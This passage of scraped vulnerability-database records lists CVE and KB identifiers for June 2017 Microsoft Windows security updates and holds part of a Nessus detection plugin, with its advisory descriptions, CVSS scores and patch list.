\n[CVE-2017-8482](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8482>) \n[CVE-2017-8492](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8492>) \n[CVE-2017-8490](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8490>) \n[CVE-2017-8483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8483>) \n[CVE-2017-0283](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0283>) \n[CVE-2017-8484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8484>) \n[CVE-2017-8481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8481>) 
\n[CVE-2017-8468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8468>) \n[CVE-2017-0282](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0282>) \n[CVE-2017-8469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8469>) \n[CVE-2017-8474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8474>) \n[CVE-2017-8465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8465>) \n[CVE-2017-0297](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0297>) \n[CVE-2017-0296](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0296>) \n[CVE-2017-8473](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8473>) \n[CVE-2017-8531](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8531>) \n[CVE-2017-0289](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0289>) \n[CVE-2017-0288](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0288>) \n[CVE-2017-8527](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8527>) \n[CVE-2017-0287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0287>) \n[CVE-2017-8533](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8533>) \n[CVE-2017-8532](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-8532>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Word](<https://threats.kaspersky.com/en/product/Microsoft-Word/>)\n\n### *CVE-IDS*:\n[CVE-2017-8543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8543>)0.0Unknown \n[CVE-2017-0219](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0219>)0.0Unknown \n[CVE-2017-0284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0284>)0.0Unknown 
\n[CVE-2017-0218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0218>)0.0Unknown \n[CVE-2017-0215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0215>)0.0Unknown \n[CVE-2017-8479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8479>)0.0Unknown \n[CVE-2017-0299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0299>)0.0Unknown \n[CVE-2017-8485](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8485>)0.0Unknown \n[CVE-2017-0193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0193>)0.0Unknown \n[CVE-2017-8478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8478>)0.0Unknown \n[CVE-2017-8488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8488>)0.0Unknown \n[CVE-2017-8528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8528>)0.0Unknown \n[CVE-2017-8460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8460>)0.0Unknown \n[CVE-2017-8475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8475>)0.0Unknown \n[CVE-2017-8476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8476>)0.0Unknown \n[CVE-2017-8470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8470>)0.0Unknown \n[CVE-2017-8494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8494>)0.0Unknown \n[CVE-2017-8466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8466>)0.0Unknown \n[CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)0.0Unknown \n[CVE-2017-0291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0291>)0.0Unknown \n[CVE-2017-0216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0216>)0.0Unknown \n[CVE-2017-0292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0292>)0.0Unknown \n[CVE-2017-8480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8480>)0.0Unknown \n[CVE-2017-8489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8489>)0.0Unknown 
\n[CVE-2017-0285](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0285>)0.0Unknown \n[CVE-2017-0300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0300>)0.0Unknown \n[CVE-2017-8491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8491>)0.0Unknown \n[CVE-2017-8471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8471>)0.0Unknown \n[CVE-2017-8477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8477>)0.0Unknown \n[CVE-2017-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8462>)0.0Unknown \n[CVE-2017-0173](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0173>)0.0Unknown \n[CVE-2017-0294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0294>)0.0Unknown \n[CVE-2017-8472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8472>)0.0Unknown \n[CVE-2017-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8482>)0.0Unknown \n[CVE-2017-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8492>)0.0Unknown \n[CVE-2017-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8490>)0.0Unknown \n[CVE-2017-8483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8483>)0.0Unknown \n[CVE-2017-0283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0283>)0.0Unknown \n[CVE-2017-8484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8484>)0.0Unknown \n[CVE-2017-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8481>)0.0Unknown \n[CVE-2017-8468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8468>)0.0Unknown \n[CVE-2017-0282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0282>)0.0Unknown \n[CVE-2017-8469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8469>)0.0Unknown \n[CVE-2017-8474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8474>)0.0Unknown \n[CVE-2017-8465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8465>)0.0Unknown 
\n[CVE-2017-0297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0297>)0.0Unknown \n[CVE-2017-0296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0296>)0.0Unknown \n[CVE-2017-8473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8473>)0.0Unknown \n[CVE-2017-0287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0287>)0.0Unknown \n[CVE-2017-0288](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0288>)0.0Unknown \n[CVE-2017-0289](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0289>)0.0Unknown \n[CVE-2017-8527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8527>)0.0Unknown \n[CVE-2017-8531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8531>)0.0Unknown \n[CVE-2017-8532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8532>)0.0Unknown \n[CVE-2017-8533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8533>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4022726](<http://support.microsoft.com/kb/4022726>) \n[4022714](<http://support.microsoft.com/kb/4022714>) \n[4022724](<http://support.microsoft.com/kb/4022724>) \n[4022727](<http://support.microsoft.com/kb/4022727>) \n[4022715](<http://support.microsoft.com/kb/4022715>) \n[4025342](<http://support.microsoft.com/kb/4025342>) \n[4025339](<http://support.microsoft.com/kb/4025339>) \n[4034668](<http://support.microsoft.com/kb/4034668>) \n[4034674](<http://support.microsoft.com/kb/4034674>) \n[4034681](<http://support.microsoft.com/kb/4034681>) \n[4034658](<http://support.microsoft.com/kb/4034658>) \n[4034660](<http://support.microsoft.com/kb/4034660>) \n[4022725](<http://support.microsoft.com/kb/4022725>) \n[4022717](<http://support.microsoft.com/kb/4022717>) \n[4022718](<http://support.microsoft.com/kb/4022718>) \n[4034666](<http://support.microsoft.com/kb/4034666>) \n[4034665](<http://support.microsoft.com/kb/4034665>) \n[4034672](<http://support.microsoft.com/kb/4034672>)\n\n### *Exploitation*:\nThe 
following public exploits exists for this vulnerability:", "edition": 26, "modified": "2020-07-22T00:00:00", "published": "2019-06-13T00:00:00", "id": "KLA11039", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11039", "title": "\r KLA11039Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-14T18:30:56", "description": "The remote Windows host is missing multiple security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when \n affected Microsoft browsers improperly handle objects \n in memory. An attacker who successfully exploited the \n vulnerability could obtain information to further \n compromise the user's system. (CVE-2016-3326)\n\n - An information disclosure vulnerability exists when \n the Windows kernel improperly handles objects in memory. \n An attacker who successfully exploited this vulnerability \n could obtain information to further compromise the user's \n system.(CVE-2017-0167)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. 
An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. 
An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8491, CVE-2017-8492)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt \n memory in such a way that an attacker could execute \n arbitrary code in the context of the current user.\n (CVE-2017-8517)\n\n - A remote code execution vulnerability exists when Internet \n Explorer improperly accesses objects in memory. This \n vulnerability could corrupt memory in such a way that an \n attacker could execute arbitrary code in the context of \n the current user. (CVE-2017-8519)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. 
An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8553, CVE-2017-8554)", "edition": 42, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-14T00:00:00", "title": "Windows 2008 June 2017 Multiple Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0167", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2016-3326", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/100786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100786);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\n \"CVE-2016-3326\",\n \"CVE-2017-0167\",\n \"CVE-2017-0193\",\n \"CVE-2017-0260\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8469\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8472\",\n \"CVE-2017-8473\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8488\",\n \"CVE-2017-8489\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8517\",\n \"CVE-2017-8519\",\n \"CVE-2017-8527\",\n \"CVE-2017-8528\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8534\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\"\n );\n script_bugtraq_id(\n 97473,\n 98810,\n 98818,\n 98819,\n 98820,\n 98821,\n 98822,\n 98824,\n 98826,\n 98837,\n 98839,\n 98842,\n 98845,\n 98847,\n 98848,\n 98849,\n 98851,\n 98852,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98864,\n 98865,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98900,\n 98901,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98929,\n 98933,\n 98940,\n 98942,\n 98949\n );\n script_xref(name:\"MSKB\", value:\"3217845\");\n script_xref(name:\"MSFT\", value:\"MS17-3217845\");\n script_xref(name:\"MSKB\", value:\"4018106\");\n script_xref(name:\"MSFT\", value:\"MS17-4018106\");\n script_xref(name:\"MSKB\", value:\"4021903\");\n 
script_xref(name:\"MSFT\", value:\"MS17-4021903\");\n script_xref(name:\"MSKB\", value:\"4021558\");\n script_xref(name:\"MSFT\", value:\"MS17-4021558\");\n script_xref(name:\"MSKB\", value:\"4021923\");\n script_xref(name:\"MSFT\", value:\"MS17-4021923\");\n script_xref(name:\"MSKB\", value:\"4022008\");\n script_xref(name:\"MSFT\", value:\"MS17-4022008\");\n script_xref(name:\"MSKB\", value:\"4022010\");\n script_xref(name:\"MSFT\", value:\"MS17-4022010\");\n script_xref(name:\"MSKB\", value:\"4022013\");\n script_xref(name:\"MSFT\", value:\"MS17-4022013\");\n script_xref(name:\"MSKB\", value:\"4022883\");\n script_xref(name:\"MSFT\", value:\"MS17-4022883\");\n script_xref(name:\"MSKB\", value:\"4022884\");\n script_xref(name:\"MSFT\", value:\"MS17-4022884\");\n script_xref(name:\"MSKB\", value:\"4022887\");\n script_xref(name:\"MSFT\", value:\"MS17-4022887\");\n script_xref(name:\"MSKB\", value:\"4024402\");\n script_xref(name:\"MSFT\", value:\"MS17-4024402\");\n\n script_name(english:\"Windows 2008 June 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 June 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when \n affected Microsoft browsers improperly handle objects \n in memory. An attacker who successfully exploited the \n vulnerability could obtain information to further \n compromise the user's system. (CVE-2016-3326)\n\n - An information disclosure vulnerability exists when \n the Windows kernel improperly handles objects in memory. 
\n An attacker who successfully exploited this vulnerability \n could obtain information to further compromise the user's \n system. (CVE-2017-0167)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - A remote code execution vulnerability exists in\n Microsoft Office due to improper validation of\n user-supplied input before loading dynamic link library\n (DLL) files. An unauthenticated, remote attacker can\n exploit this, by convincing a user to open a specially\n crafted file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0260)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document file, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285, CVE-2017-8534)\n\n - Multiple remote code execution vulnerabilities exist in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283, CVE-2017-8528)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document file, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted \n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8469,\n CVE-2017-8470, CVE-2017-8471, CVE-2017-8472,\n CVE-2017-8473, CVE-2017-8475, CVE-2017-8476,\n CVE-2017-8477, CVE-2017-8478, CVE-2017-8479,\n CVE-2017-8480, CVE-2017-8481, CVE-2017-8482,\n CVE-2017-8483, CVE-2017-8484, CVE-2017-8488,\n CVE-2017-8489, CVE-2017-8491, CVE-2017-8492)\n\n - A remote code execution vulnerability exists in the way \n JavaScript engines render when handling objects in memory \n in Microsoft browsers. The vulnerability could corrupt \n memory in such a way that an attacker could execute \n arbitrary code in the context of the current user.\n (CVE-2017-8517)\n\n - A remote code execution vulnerability exists when Internet \n Explorer improperly accesses objects in memory. This \n vulnerability could corrupt memory in such a way that an \n attacker could execute arbitrary code in the context of \n the current user. (CVE-2017-8519)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. 
(CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/3217845/hypervisor-code-integrity-elevation-of-privilege-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?092d59db\");\n # https://support.microsoft.com/en-us/help/4018106/microsoft-office-remote-code-execution-may-9-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?254e31fd\");\n # https://support.microsoft.com/en-us/help/4021558/cumulative-security-update-for-internet-explorer-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f2d033c7\");\n # https://support.microsoft.com/en-us/help/4021903/lnk-remote-code-execution-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc374e23\");\n # https://support.microsoft.com/en-us/help/4021923/windows-tdx-elevation-of-privilege-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?473a6578\");\n # https://support.microsoft.com/en-us/help/4022008/windows-remote-code-execution-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d418d6a\");\n # https://support.microsoft.com/en-us/help/4022010/windows-kernel-information-disclosure-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.nessus.org/u?efcac01f\");\n # https://support.microsoft.com/en-us/help/4022013/windows-kernel-information-disclosure-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b34d26a1\");\n # https://support.microsoft.com/en-us/help/4022883/windows-kernel-information-disclosure-vulnerability-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ee2f1c8\");\n # https://support.microsoft.com/en-us/help/4022884/security-update-for-windows-server-2008-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c4944e33\");\n # https://support.microsoft.com/en-us/help/4022884/security-update-for-windows-server-2008-june-13-2017/security-update-for-windows-server-2008-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c4944e33\");\n # https://support.microsoft.com/en-us/help/4024402/windows-search-vulnerabilities-in-windows-server-2008-june-13-2017\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb6eea1d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB3217845\n - KB4018106\n - KB4021558\n - KB4021903\n - KB4021923\n - KB4022008\n - KB4022010\n - KB4022013\n - KB4022883\n - KB4022884\n - KB4022887\n - KB4024402\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
